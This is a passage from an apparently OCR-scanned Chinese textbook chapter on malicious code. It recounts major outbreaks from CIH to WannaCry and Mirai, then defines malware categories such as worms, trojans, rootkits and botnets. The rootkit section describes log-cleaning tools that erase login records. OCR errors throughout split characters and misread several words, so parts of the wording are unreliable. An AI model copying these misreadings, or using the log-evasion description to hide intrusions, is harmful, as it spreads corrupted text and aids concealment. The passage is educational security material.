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驱动 器 不 停 旋转 ,硬盘 上 的 所 有 数据 (包括 分 区 表 ) 被 破坏 ,必须 对 硬盘 重新 分 区 才 有 可 能 挽 
救 硬盘 。 同 时 ,对 于 部 分 厂 牌 的 主板 (如 技嘉 和 微星 等 ) ,会 将 Flash BIOS 中 的 系统 程序 破 
坏 , 造 成 开机 后 系统 无 反应 。1999 年 4 月 26 日 ,CIH 病毒 在 全 球 范围 大 规模 爆发 ,造成 近 
6000 万 台 计 算 机 瘫痪 ,估计 经 济 损失 在 100 亿美 元 左右 。 


1.3.10 网 络 时 代 : 蠕虫 


1999 年 Happy99 等 完全 通过 Internet 传播 的 蠕虫 的 出 现 标 志 着 网 络 恶意 代码 成 为 新 
的 挑战 。 其 特点 就 是 利用 Internet 的 优势 ,快速 进行 大 规模 的 传播 ,从 而 使 蠕虫 在 极 短 的 时 
间 内 遍布 全 球 。 

2000 年 爱 虫 病毒 通过 Outlook 电子 邮件 系统 传播 ,邮件 主题 为 ILove You”, 并 包含 一 
个 附件 。 一 旦 打开 这 个 邮件 ,系统 就 会 自动 复制 并 向 地 址 簿 中 的 所 有 邮件 地 址 发 送 这 个 病 
毒 ,邮件 系统 将 会 变 慢 ,并 可 能 导致 整个 网 络 系统 崩溃 。 由 于 是 通过 电子 邮件 系统 传播 , 爱 
虫 病毒 在 很 短 的 时 间 内 就 袭击 了 全 球 无 以 数 计 的 计算 机 ,甚至 美国 国防 部 的 多 个 安全 部 门 、 
美国 中 央 情 报 局 英国 国 会 等 政府 机 构 及 多 个 跨国 公司 的 电子 邮件 系统 都 遭 到 袭击 。 根 据 
媒体 估计 , 爱 虫 病毒 造成 大 约 100 亿美 元 的 损失 。 

2001 年 7 月 中 旬 ,一 种 名 为 “红色 代码 ”的 恶意 代码 在 美国 大 面积 草 延 ,这 个 专门 攻击 
服务 器 的 恶意 代码 攻击 了 白宫 网 站 ,造成 了 全 世界 恐慌 。8 月 初 ,其 变种 “红色 代码 2” 针 对 
中 文系 统 做 了 修改 ,增强 了 对 中 文 网 站 的 攻击 能 力 , 开 始 在 中 国 蔓延 。“ 红 色 代码 ”通过 黑客 
攻击 手段 利用 服务 器 软件 的 漏洞 来 传播 ,造成 了 全 球 100 万 个 以 上 的 系统 被 攻陷 而 导致 次 
痪 。 这 是 恶意 代码 与 网 络 黑客 首次 结合 ,对 后 来 的 恶意 代码 产生 了 很 大 的 影响 。 

2003 年 ,“2003 蠕虫 王 ” 在 亚洲 美洲、 澳大利亚 等 地 迅速 传播 ,造成 了 全 球 性 的 网 络 灾 
害 。 其 中 受害 最 严重 的 无 疑 是 美国 和 韩国 这 两 个 Internet 发 达 的 国家 。 其 中 韩国 70% 的 
网 络 服务 器 处 于 瘫痪 状态 ,网 络 连接 的 成 功率 低 于 10% ,整个 网 络 速度 极 慢 。 美 国 不 仅 公 
众 网 络 受到 了 破坏 性 攻击 ,甚至 连 银行 网 络 系统 也 遭 到 了 破坏 ,使 全 国 1. 3 万 台 自 动 取款 机 
都 处 于 瘫痪 状态 。 

2004 年 是 蠕虫 泛滥 的 一 年 ,根据 中 国 计 算 机 病毒 应 急 处 理 中 心 的 调查 显示 ,2004 年 十 
大 流行 恶意 代码 都 是 蠕虫 ,它们 包括 网 络 天 空 (Worm. Netsky)、 高 波 (Worm. Agobot)、 爱 
情 后 门 (Worm. Lovgate)、 震 荡 波 (Worm. Sasser)、SCO 炸弹 (Worm. Novarg)、 冲 击 波 
(Worm. Blaster) 、 恶 应 (Worm. Bbeagle) ,小 邮差 (Worm. Mimail) ,求职 信 (Worm. Klez)、 大 
无 极 (Worm. SoBig) 。 


1.3.11 网 络 时 代 : 木马 


2005 一 2006 年 特洛伊 木马 流行 ,除了 BO2K、 冰 河 、 灰 蚀 子 等 经 典 木马 外 ,其 变种 层 出 
不 穷 。 据 江 民 病毒 预警 中 心 监测 的 数据 显示 ,2006 年 1 一 6 月 全 国共 有 7 322 453 台 计 算 机 
感染 了 病毒 ,其 中 感染 木马 的 计算 机 2 384 868 台 , 占 病毒 感染 计算 机 总 数 的 32. 56%。 

2008 年 11 月, 出现 了 一 种 名 为 ^ 飞 客 ”( 英 文 名称 Conficker、Downup、Downadup 或 
Kido) 的 针对 Windows 操作 系统 的 蠕虫 病毒 。“ 飞 客 ” 蠕 虫 利用 Windows RPC 远程 连接 调 
用 服务 存在 的 高 危 漏洞 (MS08-067) 入 侵 互 联网 上 未 进行 有 效 防护 的 主机 ,通过 局 域 网 、.U 
盘 等 方式 快速 传播 ,并 且 会 停 用 感染 主机 的 一 系列 Windows 服务 。 与 传统 蠕虫 相 比 “ 飞 
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客 ” 蠕 虫 的 自我 保护 能 力 大 大 增强 : 它 内 置 复杂 的 域名 生成 算法 ,产生 数 以 万 计 的 域名 供 黑 
客 选择 使 用 来 实施 控制 及 更 新 程序 ; 采用 P2P 机 制 极 大 地 提升 其 传播 能 力 ; 受到 感染 的 系 
统 会 将 Conficker 代码 不 断 更 新 ,其 终极 版 本 甚至 可 以 阻止 DNS 的 查找 能 力 , 禁 用 系统 的 
自动 更 新 , 杀 死 反 恶 意 软件 。 自 2008 年 以 来 ,“ 飞 客 ”蠕虫 衍生 了 多 个 变种 ,这 些 变 种 感染 了 
上 亿 台 主机 ,构建 了 一 个 庞大 的 攻击 平台 ,不 仅 能 够 用 于 大 范围 的 网 络 欺诈 和 信息 窃取 ,而 
且 能 够 被 利用 发 动 无 法 阻挡 的 大 规模 拒绝 服务 攻击 ,甚至 可 能 成 为 有 力 的 网 络 战 工具 。 虽 
然 " 飞 客 ” 蠕 虫 尚 未 直接 被 用 于 发 动 针对 某 一 重要 信息 系统 的 大 规模 网 络 攻 击 ,但 是 也 有 “ 飞 
客 ”蠕虫 干扰 政府 和 军队 等 重要 部 门 正 常 运行 的 多 个 报道 。 例 如 ,2009 年 1 月 15 日 ,法 国 
海军 内 部 计算 机 系统 感染 " 飞 客 "蠕虫 ,随后 该 网 络 被 隔离 迫使 几 个 空军 基地 因 无 法 下 载 飞 
行 计划 而 停 飞 ; 英国 国防 部 报道 ,“ 飞 客 ”蠕虫 感染 了 皇家 海军 军舰 .皇家 海军 潜艇 ,行政 办 
公 室 \ 谢 菲尔德 医院 等 部 门 的 800 余 台 主机 ; 2009 年 2 月 2 日 ,德国 统一 武装 部 队 称 他 们 有 
约 100 台 主 机 被 感染 ; 2009 年 2 月 ,英国 曼彻斯特 议会 IT 系统 因 感 染 “ 飞 客 ”蠕虫 而 中 断 ， 
造成 约 150 万 英镑 的 损失 ; 2010 年 1 月 ,英国 曼彻斯特 警方 的 计算 机 系统 被 感染 ,致使 与 国 
家 警察 系统 中 断 连接 三 天 ,曼彻斯特 警方 对 车 辆 和 人 员 的 例 行 检查 不 得 不 委托 其 他 地 区 警 
察 代为 执行 。 


1.3.12 网 络 时 代 : 工业 互联 网 恶意 代码 


Stuxnet 蠕虫 病毒 ( 震 网 病毒 ,又 名 超级 工厂 病毒 ) 最 早出 现在 2010 年 6 月 ,是 世界 上 第 
一 个 包含 PLC Rootkit 的 计算 机 蠕虫 ,也 是 第 一 个 专门 针对 工业 控制 系统 编写 的 破坏 性 病 
毒 ,能 够 利用 Windows 系统 和 西门 子 SIMATIC WinCC 系统 的 7 个 漏洞 对 能 源 .电力 、 化 工 
等 关键 工业 基础 设施 进行 攻击 。 据 称 ,该 病毒 起 源 于 2006 年 前 后 由 时 任 美国 总 统 小 布什 和 启 
动 的 “奥运 会 计划 ”。2008 年 ,奥巴马 上 任 后 下 令 加 速 该 计划 。 据 赛 门 铁 克 公 司 的 统计 , 截 
止 到 2010 年 9 月 全 球 有 约 45 000 个 网 络 ,60 吧 的 个 人 计算 机 被 该 蠕虫 感染 , 近 60% 的 感染 
发 生 在 伊朗 ,其 次 为 印尼 ( 约 20%) 和 印度 ( 约 10%)。 据 报道 ,Stuxnet 蠕虫 病毒 感染 并 破坏 
了 伊朗 纳 坦 兹 的 核 设施 ,并 最 终 使 伊朗 的 布什 尔 核 电站 推迟 启动 。Stuxnet 蠕虫 病毒 还 令 
德黑兰 的 核 计划 拖 后 了 两 年 。 


1.3.13 网络 时 代 : 物 联网 恶意 代码 


随 着 近年 来 物 联网 概念 的 流行 ,大 量 的 智能 设备 不 断 地 接 入 互联 网 ,其 安全 脆弱 性 、 封 
闭 性 等 特点 成 为 黑客 争 相 夺取 的 资源 。 目 前 已 经 存在 大 量 针 对 物 联网 的 伪 尸 网 络 ,如 
QBOT、Luabot、Bashlight、Zollard、Remaiten、KTN-RM 等 ,并 且 越 来 越 多 的 传统 僵尸 也 开 
始 加 入 到 这 个 行列 中 。 因 为 物 联网 智能 设备 普遍 24 小 时 在 线 ,感染 恶意 程序 后 也 不 易 被 用 
户 察觉 ,形成 了 “稳定 ”的 攻击 源 。 

2016 年 年 底 , 因 美国 东海 岸 大 规模 断 网 事件 德国 电信 大 量 用 户 访问 网 络 异常 事件 ， 
Mirai 恶意 程序 受到 广泛 关注 。2016 年 10 月 21 日 ,Mirai 控制 的 僵尸 网 络 对 美国 域名 服务 
器 管理 服务 供应 商 Dyn 发 起 DDoS 攻击 ,导致 美国 多 个 城市 出 现 互联 网 瘫痪 情况 ,包括 
Twitter、Paypal、Github 等 在 内 的 大 量 互 联网 知名 网 站 数 小 时 无 法 正常 访问 。2016 年 
11 月 28 日 前 后 德国 电信 遭遇 了 由 Mirai 僵尸 网 络 发 起 的 攻击 ,从 而 引发 了 大 范围 的 网 络 故 
障 ,2000 万 固定 网 络 用 户 中 大 约 有 90 万 个 路 由 器 发 生 故 障 ( 约 4. 5%)。 在 2016 年 11 一 
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12 月 期 间 , 利 比 亚 反 复 遭 受 来 自 Mirai 僵尸 网 络 的 大 流量 .长 时 间 DDoS 攻击 。 在 被 攻击 期 
间 ,利比亚 全 国 的 网 络 均 处 于 脱 机 状态 ,对 金融 行业 造成 了 很 大 的 损害 。 据 统计 ,2016 年 11 
月 2 一 5 日 ,利比亚 遭受 的 攻击 流量 超过 了 500Gb/s。 

Mirai 是 一 款 典 型 的 利用 物 联网 智能 设备 漏洞 进行 人 侵 渗透 以 实现 对 设备 控制 的 恶意 
代码 。Mirai 通过 扫描 网 络 中 的 Telnet 等 服务 来 进行 传播 ,由 于 采用 高 级 SYN 扫描 ,扫描 
速度 提升 30 倍 以 上 ,提高 了 感染 速度 ; 一 旦 通过 Telnet 服务 进入 , 便 强制 关闭 Telnet 服 
务 ,以 及 其 他 SSH 和 Web 等 人口 ,并且 占用 服务 端口 防止 这 些 服 务 复活 ; 同时 强制 清除 其 
他 主流 的 IoT 僵尸 程序 ,如 QBOT、Zollard、Remaiten Bot、anime Bot 以 及 其 他 僵尸 独占 资 
源 ; 还 会 过 滤 掉 通用 电气 公司 、 惠 普 公 司 .美国 国家 邮政 局 .国防 部 等 公司 和 机 构 的 IP ,防止 
无 效 感染 。 据 统计 ,到 2016 年 10 月 26 日 ,全 球 感染 Mirai 的 设备 超过 100 万 台 , 其 中 美国 
感染 设备 有 418 592 台 ,中 国内 地 有 145 778 台 ,澳大利亚 94912 台 ,日 本 和 中 国 香港 分 别 为 
47 198 和 44 386 台 。 


1.3.14 网 络 时 代 : 勒索 型 恶意 代码 


2016 年 起 ,IBM、Symantec、360 等 国内 外 多 家 安全 厂商 纷纷 开始 关注 勒索 病毒 的 威胁 。 
2016 年 12 月 ,360 互联 网 安全 中 心 发 布 了 《2016 项 诈 者 病毒 威胁 形势 分 析 报 告 (年 报 )》。 
该 报告 指出 ,2016 年 ,全 国 至 少 有 497 万 多 台 用 户 计算 机 遭 到 了 勒索 病毒 攻击 ,成 为 对 网 民 
直接 威胁 最 大 的 一 类 木马 病毒 。 

2017 年 5 月 12 日 ,WannaCry 勒索 病毒 事件 全 球 爆 发 ,该 病毒 以 类 似 于 蠕虫 的 方式 传 
播 ,攻击 主机 并 加 密 主 机 上 存储 的 文件 ,然后 要 求 以 比特 币 的 形式 支付 赎金 。 至 少 150 个 国 
家 、30 万 名 用 户 中 招 ,影响 到 金融 能源 .医疗 等 众多 行业 ,造成 损失 达 80 亿美 元 。 

2017 年 6 月 ,一 个 名 为 Petya 的 勒索 病毒 再 度 肆虐 全 球 ,包括 乌克兰 首都 国际 机 场 、 乌 
克 兰 国家 储蓄 银行 .邮局 地 铁 、. 船 舶 公司 ,俄罗斯 的 石油 和 天 然 气 巨头 Rosneft, 丹 麦 的 航 
运 巨头 马士基 公司 ,美国 制药 公司 默 克 公司 、 美 国 律师 事务 所 DLA Piper, 乌 克 兰 一 些 商业 
银行 以 及 部 分 私人 公司 零售 企业 和 政府 系统 ,甚至 是 核能 工厂 都 遭 到 了 攻击 。 与 
WannaCry 相 比 ,该 病毒 会 加 密 NTFS 分 区 ,覆盖 MBR ,阻止 机 器 正常 启动 ,影响 更 加 严重 。 
2017 年 10 月 ,勒索 病毒 BadRabbit 在 东欧 爆发 ,导致 乌克兰 、 俄 罗斯 等 企业 及 基础 设施 受 

此 外 ,2017 年 ,搜索 引擎 Elasticsearch、 韩 国 网 络 托管 公司 Nayana、 通 用 汽车 制造 中 心 
等 也 先后 遭遇 勒索 病毒 攻击 。2017 年 甚至 还 出 现 了 一 款 冒 充 “ 王 者 荣耀 辅助 工具 ”的 袭击 
移动 设备 的 勒索 病毒 。 有 媒体 戏称 2017 年 为 “被 勒索 ”的 一 年 。 

2018 年 4 月 ,Check Point 公司 在 发 布 的 (全 球 恶意 软件 威胁 影响 指数 ) 中 公布 了 3 月 
份 十 大 最 受 网 络 犯 罪 分 子 “ 欢 迎 ” 的 恶意 软件 。 

(1) Coinhive: 一 款 加 密 货 币 挖 矿 恶意 软件 ,会 将 JavaScript 加 密 货币 挖 矿 脚本 嵌入 在 
被 攻击 网 站 的 网 页 中 。 当 访客 访问 该 网 站 时 ,会 利用 访客 的 计算 机 CPU 资源 来 挖掘 加 密 
货币 ,占用 大 量 的 系统 资源 ,最 终 导致 网 站 访客 的 计算 机 性 能 下 降 。 

(2) Rig EK( 漏 洞 利 用 工具 包 ,Exploit Kit) : 漏洞 利用 工具 ,2014 年 首次 出 现 ,提供 对 
Flash、Java、Silverlight 和 Internet Explorer 的 漏洞 利用 ,曾经 一 度 成 为 Exploit Kit 市 场 的 
领先 者 。 
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(3) CryptoLoot: 与 Coinhive 类 似 的 JS 控 矿 引擎 ,也 是 在 有 访问 量 的 网 站 中 嵌入 加 密 货 
币 挖 矿 脚本 ,利用 访客 的 计算 机 CPU 资源 进行 加 密 货 币 挖掘 。 不 过 CryptoLoot 平台 的 佣金 比 
Coinhive 平 台 的 佣金 低 很 多 ,这 可 以 大 大 降低 以 控 矿 为 营利 目标 的 黑色 产业 链 成 本 。 

(4) RoughTed: 广告 恶意 软件 ,利用 指纹 识别 和 广告 拦截 器 绕 过 技术 ,RoughTed 能 够 
大 规模 传播 网 络 诈骗 ,广告 软件 漏洞 工具 包 与 勒索 软件 相关 的 恶意 网 站 或 者 链接 ,可 用 于 
攻击 任意 类 型 的 平台 和 操作 系统 。 

(5) JSEcoin: 也 是 与 Coinhive 类 似 的 JS 挖 矿 引 擎 ,利用 访客 的 计算 机 CPU 资源 来 挖 
掘 数字 货币 进行 伞 利 。 但 是 JSEcoin 会 将 CPU 使 用 率 限制 在 15%~25% ,并且 始终 显示 
隐私 声明 ,为 用 户 提供 退出 选项 (可 选择 不 提供 运算 服务 ) 。 

(6) Fireball: 恶意 软件 下 载 程序 ,使 用 了 防 病毒 规避 技术 ,通过 捆绑 免费 软件 的 方式 ， 
安装 浏览 器 插件 ,从 而 完全 控制 受害 者 的 Web 浏览 器 ,把 它们 变 成 “僵尸 ”, 并 让 攻击 者 对 受 
害 者 的 流量 进行 监控 ,窃取 数据 。 人 允许 攻击 者 在 受害 者 设备 上 执行 任意 代码 、 进 行 登 录 赁 证 
窃取 、 恶 意 软件 安装 等 广泛 操作 。 

(7) Andromeda: 又 名 Gamarue 或 Wauchos, 是 一 种 模块 化 木马 ,主要 被 用 作 后 门 , 在 
受 感染 的 计算 机 上 下 载 其 他 恶意 软件 ,并 可 进行 修改 以 创建 不 同类 型 的 僵尸 网 络 。 自 2011 
年 开始 活跃 ,该 僵尸 工具 来 源 于 俄罗斯 。 

(8) XMRig: 加 密 货币 挖 矿 恶 意 软 件 , 一 款 用 于 挖掘 门 罗 币 的 开源 CPU 挖 矿 软件 , 
2017 年 5 月 首次 被 用 于 恶意 攻击 活动 。 

(9) Necurs: 世界 上 最 大 的 恶意 僵尸 网 络 之 一 ,用 于 通过 垃圾 邮件 传播 恶意 软件 ,有 多 
个 恶意 家 族 木马 的 传播 被 证 明 或 怀疑 与 Necurs 木马 构建 的 僵尸 网 络 有 关 , 曾 被 称 为 “恶意 
木马 传播 的 基础 设施 ”。 

(10) Conficker: 允许 远程 操作 和 恶意 软件 下 载 的 蠕虫 。 受 感染 的 设备 由 僵尸 网 络 控 
制 ,通过 连接 Command&.Control 服务 器 以 接收 指令 。 


nl 


1.4 恶意 代码 的 种 类 


在 恶意 代码 技术 的 发 展 过 程 中 ,其 特征 不 断 变 化 ,恶意 代码 的 种 类 也 不 断 增加 。 根 据 国 
内 外 多 年 来 对 恶意 代码 的 研究 成 果 可 知 ,恶意 代码 主要 包括 普通 计算 机 病毒 .蠕虫 .特洛伊 
木马 .Rootkit 工具 流氓 软件 .间谍 软件 .恶意 广告 、. 逻 辑 炸弹 、 僵 尸 网 络 、 网 络 钓鱼 .恶意 脚 
本 、 垃 圾 信息 、 勒 索 软件 \ 移 动 终端 恶意 代码 等 。 

1. 普通 计算 机 病毒 

普通 计算 机 病毒 是 指 编 制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ， 
影响 计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 也 就 是 传统 意义 上 的 
计算 机 病毒 ,主要 包括 引导 区 型 病毒 ,文件 型 病毒 以 及 混合 型 病毒 。 感 染 引 导 区 的 病毒 是 较 
昌 的 一 种 病毒 ,主要 是 感染 DOS 操作 系统 的 引导 过 程 。 文 件 型 病毒 分 为 感染 可 执行 文件 的 
病毒 和 感染 数据 文件 的 病毒 ,前 者 主要 指 感染 COM 文件 或 EXE 文件 的 病毒 ,如 CIH 病 
毒 ,后 者 主要 指 感染 Word、PDF 等 数据 文件 的 病毒 ,如 宏 病 毒 等 。 混 合 型 病毒 主要 指 那 些 
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既 能 感染 引导 区 又 能 感染 文件 的 病毒 。 

尽管 有 些 文献 把 特洛伊 木马 .蠕虫 等 都 划 归 到 计算 机 病毒 概念 下 ,但 这 种 分 类 法 并 不 符 
合计 算 机 病毒 的 定义 。 因 此 ,本 书 所 指 的 计算 机 病毒 仅 包 括 引导 区 型 病毒 ,文件 型 病毒 以 及 
混合 型 病毒 。 

2. 蠕虫 

提起 蠕虫 ,给 读者 印象 最 深 的 就 是 冲击波” 震荡 波 ”“ 红 色 代码 ”“* 尼 姆 达 ” 等 名 称 。 这 
些 蠕虫 在 2003 年 .2004 年 达到 高 发 期 ,并 给 整个 信息 安全 领域 留 下 了 不 可 磨灭 的 印记 。 

尽管 蠕虫 的 爆发 期 是 从 2000 年 后 才 开 始 的 ,但 “蠕虫 ”这 个 名 词 由 来 已 入 。 在 1982 年 ， 
Shock 和 Hupp 根据 The Shockwave Rider 一 书 中 的 概念 提出 了 “蠕虫 "(Worm) 程 序 的 思 
想 。1988 年 , 莫 里 斯 把 一 个 被 称 为 “蠕虫 "的 恶意 代码 送 进 了 美国 的 计算 机 网 络 , 正 式 宣告 
了 蠕虫 的 存在 。 

蠕虫 作为 恶意 代码 的 一 种 ,是 指 能 自我 复制 和 广泛 传播 ,以 占用 系统 和 网 络 资源 为 主要 
目的 的 恶意 程序 , 它 的 传播 通常 不 需要 所 谓 的 激活 。 它 通过 分 布 式 网 络 来 散播 特定 的 信息 
或 错误 ,进而 造成 网 络 服务 遭 到 拒绝 并 发 生死 锁 。 一 般 认 为 ,蠕虫 是 一 种 通过 网 络 传播 的 恶 
性 恶意 代码 , 它 具 有 传播 性 、 隐 项 性 、 破 坏 性 等 特性 。 此 外 ,蠕虫 还 具有 自己 特有 的 一 些 特 
征 ,如 不 利用 文件 寄生 (有 的 只 存在 于 内 存 中 ) ,对 网 络 造成 拒绝 服务 ,和 黑客 技术 相 结合 等 。 
在 破坏 程度 上 ,蠕虫 非常 强大 ,借助 于 发 达 的 Internet, 蠕 虫 可 以 在 短 短 的 数 小 时 内 蔓延 至 
整个 互联 网 ,并 造成 网 络 瘫痪 。 

3. 特洛伊 木马 

木马 的 全 称 是 特洛伊 木马 (Trojan Horse) , 原 指 古 希腊 士兵 藏 在 木马 内 进入 特洛伊 城 
从 而 占领 该 城市 的 故事 。 在 网 络 安全 领域 中 ,特洛伊 木马 是 一 种 与 远程 计算 机 建立 连接 ,使 
远程 计算 机 能 够 通过 网 络 控制 用 户 计算 机 系统 并 且 可 能 造成 用 户 信 息 损失 、 系 统 损 坏 甚 至 
瘫痪 的 程序 。 

一 个 完整 的 木马 系统 由 硬件 部 分 、 软 件 部 分 和 具体 连接 部 分 组 成 。 

(1) 硬件 部 分 : 建立 木马 连接 所 必需 的 硬件 实体 ,包含 有 控制 端 \ 服 务 端 和 Internet。 
控制 端 指 对 服务 端 进行 远程 控制 的 一 方 。 服 务 端 指 被 控制 端 远程 控制 的 一 方 。Internet 是 
控制 端 对 服务 端 进 行 远程 控制 以 及 数据 传输 的 网 络 载 体 。 

(2) 软件 部 分 : 实现 远程 控制 所 必需 的 软件 程序 ,包含 有 控制 端 程序 .木马 程序 和 木马 
配置 程序 。 控 制 端 程序 是 控制 端 用 于 提供 远程 控制 服务 端的 程序 。 木 马 程序 是 潜伏 在 服务 
端 内 部 ,获取 其 操作 权限 的 程序 。 木 马 配置 程序 用 于 设置 木马 程序 的 端口 号 、 触 发 条 件 、 木 
马 名 称 等 ,并 使 其 在 服务 端 隐藏 得 更 隐蔽 的 程序 。 

(3) 连接 部 分 : 通过 Internet 在 服务 端 和 控制 端 之 间 建 立 一 条 木马 通道 所 必需 的 元 素 。 
包含 有 控制 端 和 服务 端的 IP 以 及 相应 端口 。 控 制 端 IP 和 服务 端 IP 即 控制 端 和 服务 端的 
网 络 地 址 ,也 是 木马 进行 数据 传输 的 始 发 地 和 目的 地 。 控 制 端 端 口 和 木马 端口 即 控制 端 和 
服务 端的 数据 入 口 ,通过 这 个 入口 ,服务 端 数 据 可 直达 控制 端 程序 或 木马 程序 。 

4. Rootkit 工具 


Rootkit 是 攻击 者 用 来 隐藏 自己 的 踪迹 和 保留 Root 访问 权限 的 工具 。 在 众多 Rootkit 
中 ,针对 SunOS 和 Linux 两 种 操作 系统 的 Rootkit 最 多 。 所 有 的 Rootkit 基本 上 都 是 由 几 
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个 独立 的 程序 组 成 的 。 一 个 典型 Rootkit 包括 以 下 内 容 。 

(1) 网 络 嗅 探 程序 : 通过 网 络 嗅 探 ,获得 网 络 上 传输 的 用 户 名 .账户 和 密码 等 信息 。 

(2) 特洛伊 木马 程序 : 为 攻击 者 提供 后 门 。 例 如 inetd 或 者 login。 

(3) 隐藏 攻击 者 的 目录 和 进程 的 程序 : 例如 ps、netstat、rshd 和 1s 等 。 

(4) 日 志清 理工 具 : 例如 zap、zap2 或 者 z2 ,攻击 者 使 用 这 些 清理 工具 删除 wtmp、utmp 
和 lastlog 等 日 志文 件 中 有 关 自 己 行踪 的 条 目 。 

此 外 ,一 些 复 杂 的 Rootkit 还 可 以 向 攻击 者 提供 telnet、Shell 和 finger 等 服务 。 还 可 能 
包括 一 些 用 来 清理 /var/log 和 /var/adm 目录 中 其 他 文件 的 一 些 脚 本 。 

5. 流 误 软件 了 

“流氓 软件 ”是 20 世纪 的 一 个 新 生词 汇 ,是 一 个 源 自 网 络 的 词汇 。 近 年 来 ,一些 流氓 软 
件 引 起 了 用 户 和 媒体 的 强烈 关注 。 流 谍 软 件 的 典型 表现 是 采用 特殊 手段 频繁 弹出 广告 窗 
口 ,危及 用 户 隐 私 , 严 重 干扰 用 户 的 日 常 工作 .数据 安全 和 个 人 隐私 。 

如 果 说 计算 机 病毒 是 由 小 团体 或 者 个 人 秘密 地 编写 和 散播 的 ,那么 流氓 软件 的 创作 者 
则 涉嫌 很 多 知名 企业 和 团体 。 这 些 软件 在 计算 机 用 户 中 引起 了 公愤 ,许多 用 户 指责 它们 为 
“彻头彻尾 的 流氓 软 件 ”。 流 谍 软 件 的 泛滥 ,成 为 互联 网 安全 的 新 威胁 。 根据 瑞 星 发 布 的 
《2006 上 半年 电脑 病毒 疫情 & 互联 网 安全 报告 ) 的 数据 显示 ,2006 年 上 半年 ,中 国 流 谍 软 件 
的 危害 已 经 超过 了 普通 计算 机 病毒 。 

迄今 为 止 ,流氓 软件 还 没有 一 个 公认 的 统一 定义 。 中 国 反 流 氓 软件 联盟 和 奇 虎 公司 都 
试图 统一 流氓 软件 的 定义 ,但 都 没有 成 功 。 以 下 为 流 谍 软件 的 两 种 定义 。 

第 一 种 定义 : 流氓 软件 是 指 具 有 一 定 的 实用 价值 但 具备 计算 机 病毒 和 黑客 部 分 行为 特 
征 的 软件 。 它 处 于 合法 软件 和 计算 机 病毒 之 间 的 灰色 地 带 , 它 会 造成 无 法 卸载 并 强行 弹出 
广告 和 窃取 用 户 的 私人 信息 等 危害 。 

第 二 种 定义 : 流 谍 软 件 是 介 于 病毒 和 正规 软件 之 间 的 软件 ,同时 具备 正常 功能 (下 载 、 
媒体 播放 等 ) 和 恶意 行为 (弹出 广告 . 开 后 门 ) ,给 用 户 带 来 实质 危害 。 它 们 往往 采用 特殊 手 
段 频繁 弹出 广告 窗口 ,危及 用 户 隐 私 , 严 重 干扰 用 户 的 日 常 工作 ,数据 安全 和 个 人 隐私 。 

总 之 ,流氓 软件 是 对 网 络 上 散播 的 符合 如 下 条 件 的 软件 的 一 种 称呼 。 

(1) 未 经 用 户 许可 ,或 者 利用 用 户 疏 忽 ,或 者 利用 用 户 缺 乏 相关 知识 ,秘密 收集 用 户 个 
人 信息 、 秘 密 和 隐私 。 

(2) 有 侵害 用 户 信息 和 财产 安全 的 潜在 因素 或 者 隐患 。 

(3) 强行 弹出 广告 ,或 者 其 他 干扰 用 户 并 占用 系统 资源 的 行为 。 

(4) 强行 修改 用 户 软件 设置 ,例如 浏览 器 主页 .软件 自动 启动 选项 ,安全 选项 。 

(5) 采用 多 种 社会 和 技术 手段 ,强行 或 者 秘密 安装 ,并 抵制 卸载 。 

6. 间谍 软件 

间谍 软件 (Spyware) 是 一 种 能 够 在 计算 机 使 用 者 无 法 察觉 或 给 计算 机 使 用 者 造成 安全 
假象 的 情况 下 ,秘密 收集 计算 机 信息 并 把 它们 传播 给 他 人 的 程序 。 间 谍 软 件 可 以 像 普通 计 
算 机 病毒 一 样 进入 计算 机 或 绑 定 安装 程序 而 进入 计算 机 。 间 谍 软 件 经 常会 在 未 经 用 户 同 意 
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或 者 用 户 没 有 意识 到 的 情况 下 ,以 正 工具 条 ,快捷 方式 、 作 为 驱动 程序 下 载 或 由 于 单 击 一 些 
欺骗 的 弹出 式 窗口 选项 等 其 他 用 户 无 法 察觉 的 形式 ,被 安装 在 用 户 的 计算 机 内 。 

虽然 那些 被 安装 了 间谍 软件 的 计算 机 使 用 起 来 和 正常 计算 机 并 没有 太 大 区 别 , 但 用 户 
的 隐私 数据 和 重要 信息 会 被 那些 间谍 软件 捕获 ,这 些 信息 将 被 发 送 给 互联 网 另 一 端的 操纵 
者 ,甚至 这 些 间 谍 软 件 还 能 使 黑客 操纵 用 户 的 计算 机 ,或 者 说 这 些 有 “后 门 * 的 计算 机 都 将 成 
为 黑客 和 病毒 攻击 的 重要 目标 和 潜在 目标 。 

7. 恶意 广告 

恶意 广告 也 称 为 广告 软件 ,通常 包括 间谍 软件 的 成 分 ,也 可 以 认为 是 恶意 软件 。 广 告 软 
件 是 指 未 经 用 户 允 许 , 下 载 并 安装 或 与 其 他 软件 捆绑 通过 弹出 式 广告 或 以 其 他 形式 进行 商 
业 广 告 宣传 的 程序 。 安 装 广告 软件 之 后 ,往往 造成 系统 运行 缓慢 或 系统 异常 。 

8. 逻辑 炸弹 

逻辑 炸弹 (Logic Bomb) 是 合法 的 应 用 程序 ,只 是 在 编程 时 被 故意 写 和 人 某 种 “恶意 功 
能 ”。 例 如 ,作为 某 种 版 权 保护 方案 , 某 个 应 用 程序 有 可 能 会 在 运行 几 次 后 就 在 硬盘 中 将 其 
自身 删除 ; 某 个 程序 员 可 能 在 他 的 程序 中 放置 某 些 多 余 的 代码 ,以 使 程序 运行 时 对 某 些 系 
统 产生 恶意 操作 。 在 大 的 项 目 中 ,如 果 代 码 检查 措施 有 限 , 被 植 入 逻辑 炸弹 的 可 能 性 是 很 
大 的 。 

9. 后 门 

后 门 (Back Door) 是 指 绕 过 安全 性 控制 而 获取 对 程序 或 系统 访问 权 的 方法 。 在 软件 的 
开发 阶段 ,程序 员 常常 会 在 软件 内 创建 后 门 以 方便 修改 程序 中 的 缺陷 。 如 果 后 门 被 其 他 人 
知道 ,或 是 在 发 布 软件 之 前 没有 被 删除 ,那么 它 就 成 了 安全 隐患 。 

10. 僵尸 网 络 

僵尸 网 络 (Botnet) 是 指 采用 一 种 或 多 种 传播 手段 ,使 大 量 主机 感染 Bot 程序 (僵尸 程 
序 ) ,从 而 在 控制 者 和 被 感染 主机 之 间 形 成 一 个 可 实现 一 对 多 控制 的 网 络 。 

攻击 者 通过 各 种 途径 传播 僵尸 程序 感染 互联 网 上 的 大 量 主机 ,而 被 感染 的 主机 将 通过 
一 个 控制 信道 接收 攻击 者 的 指令 ,组 成 一 个 僵尸 网 络 。 网 络 中 被 寄宿 了 Bot 程序 的 主机 被 
称 为 “肉鸡 ”。 

